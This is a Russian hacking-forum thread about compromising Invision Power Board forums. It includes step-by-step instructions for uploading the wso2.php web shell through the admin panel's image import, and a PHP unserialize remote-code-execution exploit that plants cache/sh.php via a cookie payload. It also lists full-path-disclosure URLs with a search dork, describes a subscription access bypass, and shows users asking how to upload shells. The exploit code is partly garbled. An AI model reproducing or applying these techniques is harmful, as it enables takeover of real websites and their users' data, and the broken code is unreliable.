31.10.2012, 01:23
|
|
Новичок
Регистрация: 04.01.2012
Сообщений: 5
С нами:
7555286
Репутация:
0
|
|
Сообщение от Pashkela
Залитие шелла из админки IPB 3... (тестилось на IPB 3.0.1 nulled и 3.0.2-лицуха) -
еще один вариант
по аналогии с этим постом:
/showpost.php?p=977862&postcount=10
но небольшие изменения:
1. Ставим себе на локалхост IPB 3.0.1 к примеру нуленый
2. Идем в админку - Внешний вид - IP.Board - Настройки - смотрим "Директория с изображениями" - по дефолту "public/style_images/master"
3. Идем в нашу папочку (на примере Denwer)
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
и суем туда наш любимый wso2.php
4. Админка - Внешний вид - Импорт / Экспорт - Экспорт - Экспорт изображений - Какие изображения экспортировать? - IP.Board - Экспорт изображений - получаем архив images-master.xml.gz
5. В архиве файлик images-master.xml
Переименовываем архив!
таким образом - обязательная процедура, иначе при попытке импорта на целевом сайте изображений стиля напишет "папка public/style_images/master уже существует!" -
images-master2.xml.gz
, название файлика в архиве сменится автоматом
6. Админка - Внешний вид - Импорт / Экспорт - Импорт - Импорт изображений - Загрузка XML-архива с изображениями - Обзор - images-master2.xml.gz - Импорт изображений
Рядом с
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
появится
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master2
где будет лежать все тоже самое, плюс наш шелл
в итоге шелл будет по адресу:
http://forum.site.ru/public/style_images/master2/wso2.php
PS: не забудьте потом переместить шелл и удалить каталог master2
Готовый архив с картинками и
шеллом
можно взять
тут
, останется только изменить циферку мб у кого архив с шеллом остался перезалейте пожалуйста
|
|
|
27.11.2012, 18:03
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
С нами:
10467746
Репутация:
4738
|
|
[B]Invision Power Board \n";
print"\nExample....: php$argv[0]localhost /";
print"\nExample....: php$argv[0]localhost /ipb/\n";
die();
}
list($host,$path) = array($argv[1],$argv[2]);
$packet="GET{$path}index.php HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Connection: close\r\n\r\n";
$_prefix=preg_match('/Cookie: (.+)session/',http_send($host,$packet),$m) ?$m[1] :'';
classdb_driver_mysql
{
public$obj= array('use_debug_log'=>1,'debug_log'=>'cache/sh.php');
}
# Super bypass by @i0n1c
$payload=urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2 :{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"c ache/sh.php";}}}');
$phpcode='';
$packet="GET{$path}index.php?{$phpcode}HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Cookie:{$_prefix}member_id={$payload}\r\n";
$packet.="Connection: close\r\n\r\n";
http_send($host,$packet);
$packet="GET{$path}cache/sh.php HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Cmd: %s\r\n";
$packet.="Connection: close\r\n\r\n";
if (preg_match('/
[/COLOR]
[/PHP]
(c) exploit-db.com
|
|
|
|
28.11.2012, 10:21
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
[QUOTE="-=lebed=-"]
[B][COLOR="Red"]Invision Power Board
|
|
|
|
14.12.2012, 14:13
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами:
10362626
Репутация:
327
|
|
скорее фишка, которая катит на некоторых версиях ipb, пока не разобрался от чего все зависит.
суть:
есть вероятность подписатся на тему , зная ее номер с пользователя не имеющего прав для просмотра темы.
/subscription.php?do=addsubscription&t=[номер_темы]
|
|
|
|
17.12.2012, 01:57
|
|
Новичок
Регистрация: 19.02.2010
Сообщений: 1
С нами:
8539491
Репутация:
6
|
|
IPBoard 3.x.x/3.4 Full Path Disclosure
Код:
Exploit: admin/upgrade/index.php?app=upgrade&s=§ion[]=index&do=login
Dork: intext:Community Forum Software by IP.Board
Fix: Turn off display_errors in php.ini
//...Leaked bY beBoss..// |
|
|
|
26.12.2012, 10:23
|
|
Участник форума
Регистрация: 15.02.2006
Сообщений: 122
С нами:
10649839
Репутация:
0
|
|
IPBoard 3.x.x/3.4 Full Path Disclosure
Код:
http://localhost/forum/admin//setup/templates/skin_setup.php
http://localhost/forum/admin//setup/cli/output.php
http://localhost/forum/admin//setup/applications/install/sections/
http://localhost/forum/admin//sources/classes/ads.php
http://localhost/forum/admin//sources/classes/archive/reader/sql.php
http://localhost/forum/admin//sources/classes/archive/restore/sql.php
http://localhost/forum/admin//sources/classes/archive/writer/sql.php
http://localhost/forum/admin//sources/classes/bbcode/custom/ccs.php
http://localhost/forum/admin//sources/classes/mapping/engines/bing.php
http://localhost/forum/admin//sources/classes/mapping/engines/google.php
http://localhost/forum/admin//sources/classes/output/adminOutput.php
http://localhost/forum/admin//sources/classes/output/formats/html/htmlOutput.php
http://localhost/forum/admin//sources/classes/output/formats/xml/xmlOutput.php
http://localhost/forum/admin//sources/classes/sabre/directory/templates.php
http://localhost/forum/admin//sources/classes/sabre/directory/groups.php
http://localhost/forum/admin//sources/classes/sabre/files/templates.php
http://localhost/forum/admin//sources/classes/sabre/lock/nolocks.php
http://localhost/forum/admin//sources/classes/sabre/root/skins.php
http://localhost/forum/admin//sources/classes/url/apis/bitly/api.php
http://localhost/forum/admin//sources/classes/url/apis/topic/api.php
http://localhost/forum/admin//sources/loginauth/convert/auth.php
http://localhost/forum/admin//sources/template_plugins/tp_addtohead.php
http://localhost/forum/admin//sources/template_plugins/tp_currency.php
http://localhost/forum/admin//sources/template_plugins/tp_date.php
http://localhost/forum/admin//sources/template_plugins/tp_editor.php
http://localhost/forum/admin//sources/template_plugins/tp_expression.php
http://localhost/forum/admin//sources/template_plugins/tp_format_number.php
http://localhost/forum/admin//sources/template_plugins/tp_include.php
http://localhost/forum/admin//sources/template_plugins/tp_ipcmedia.php
http://localhost/forum/admin//sources/template_plugins/tp_js_module.php
http://localhost/forum/admin//sources/template_plugins/tp_lang.php
http://localhost/forum/admin//sources/template_plugins/tp_replacement.php
http://localhost/forum/admin//sources/template_plugins/tp_resize_image.php
http://localhost/forum/admin//sources/template_plugins/tp_striping.php
http://localhost/forum/admin//sources/template_plugins/tp_template.php
http://localhost/forum/admin//sources/template_plugins/tp_url.php
http://localhost/forum/admin//sources/template_plugins/tp_variable.php
http://localhost/forum/admin//applications/core/setup/versions/install/knownSettings.php
http://localhost/forum/admin//applications/forums/extensions/content/plugin_blocks/site_poll/plugin.php
http://localhost/forum/admin//applications/forums/sql/mysql_topics_queries.php
http://localhost/forum/admin//applications/members/extensions/content/feed_blocks/members.php
http://localhost/forum/admin//applications/members/extensions/content/plugin_blocks/status_updates/plugin.php
http://localhost/forum/admin//applications/members/extensions/content/plugin_blocks/online_friends/plugin.php
http://localhost/forum/admin//applications/members/skin_cp/cp_skin_groups.php
http://localhost/forum/admin/setup/applications/upgrade/sections/
http://localhost/forum/admin/setup/applications/install/sections/
http://localhost/forum/admin/setup/cli/output.php
http://localhost/forum/admin//applications_addon/other/customSidebarBlocks/extensions/coreVariables.php
http://localhost/forum/admin//applications_addon/other/customSidebarBlocks/skin_cp/cp_skin_e_CSB.php
http://localhost/forum/admin//applications_addon/other/portal/skin_cp/cp_skin_portal.php
http://localhost/forum/admin//applications_addon/other/shoutbox/extensions/admin/group_form.php
http://localhost/forum/admin//applications_addon/other/shoutbox/extensions/coreVariables.php
http://localhost/forum/admin//applications_addon/other/shoutbox/skin_cp/cp_skin_moderators.php
http://localhost/forum/admin//applications_addon/other/shoutbox/skin_cp/cp_skin_overview.php
http://localhost/forum/admin//applications_addon/other/shoutbox/skin_cp/cp_skin_shoutbox_group_form.php
http://localhost/forum/admin//applications_addon/other/shoutbox/skin_cp/cp_skin_tools.php
http://localhost/forum/admin//applications_addon/other/shoutbox/skin_cp/cp_skin_banned.php
http://localhost/forum//interface//twitter/
http://localhost/forum/ips_kernel/classCacheXcache.php
http://localhost/forum/ips_kernel/classDbMysqlClient.php
http://localhost/forum/ips_kernel/classImageImagemagick.php
http://localhost/forum/ips_kernel/facebook-client/facebook_desktop.php
http://localhost/forum/ips_kernel/facebook-client/jsonwrapper/jsonwrapper_inner.php
http://localhost/forum/ips_kernel/pop3class/browse_mailbox.php
http://localhost/forum/ips_kernel/pop3class/parse_message.php
http://localhost/forum/ips_kernel/sabre/Sabre/HTTP/AWSAuth.php
и так далее)
//Когда постишь, проверяй переносы строк
//BigBear |
|
|
|
28.12.2012, 12:20
|
|
Новичок
Регистрация: 20.03.2011
Сообщений: 8
С нами:
7972886
Репутация:
0
|
|
как применить эти две уязвимости дляя 3.3х не подскажите
|
|
|
|
05.01.2013, 21:12
|
|
Познающий
Регистрация: 17.12.2011
Сообщений: 48
С нами:
7581206
Репутация:
0
|
|
Кто знает как залить шелл на IP.Board 3.3.3?
|
|
|
|
28.01.2013, 01:15
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами:
9561436
Репутация:
462
|
|
Привет всем! Возможно както залить шелл имея права модера?
|
|
|
|
28.01.2013, 08:16
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от ph1l1ster
Привет всем! Возможно както залить шелл имея права модера?
Можно при условии, что Вас пускает в администраторскую панель с модераторскими правами.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
